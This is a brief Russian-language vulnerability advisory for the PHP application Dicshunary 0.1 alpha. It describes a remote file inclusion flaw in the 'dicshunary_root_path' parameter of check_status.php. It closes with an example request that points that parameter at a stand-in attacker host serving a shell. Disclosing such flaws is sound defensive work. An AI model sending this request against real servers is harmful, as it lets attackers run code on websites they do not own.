Программа: Dicshunary 0.1 alpha
Уязвимость позволяет злоумышленнику выполнить произвольный сценарий на целевой системе. Уязвимость существует из-за ошибки в обработке входных данных в параметре «dicshunary_root_path» сценарием check_status.php. Атакующий может выполнить произвольный сценарий в контексте безопасности Web сервера.
Пример:
http://[target]/[path]/check_status.php?dicshunary_root_path=http://evilsite.com/shell?
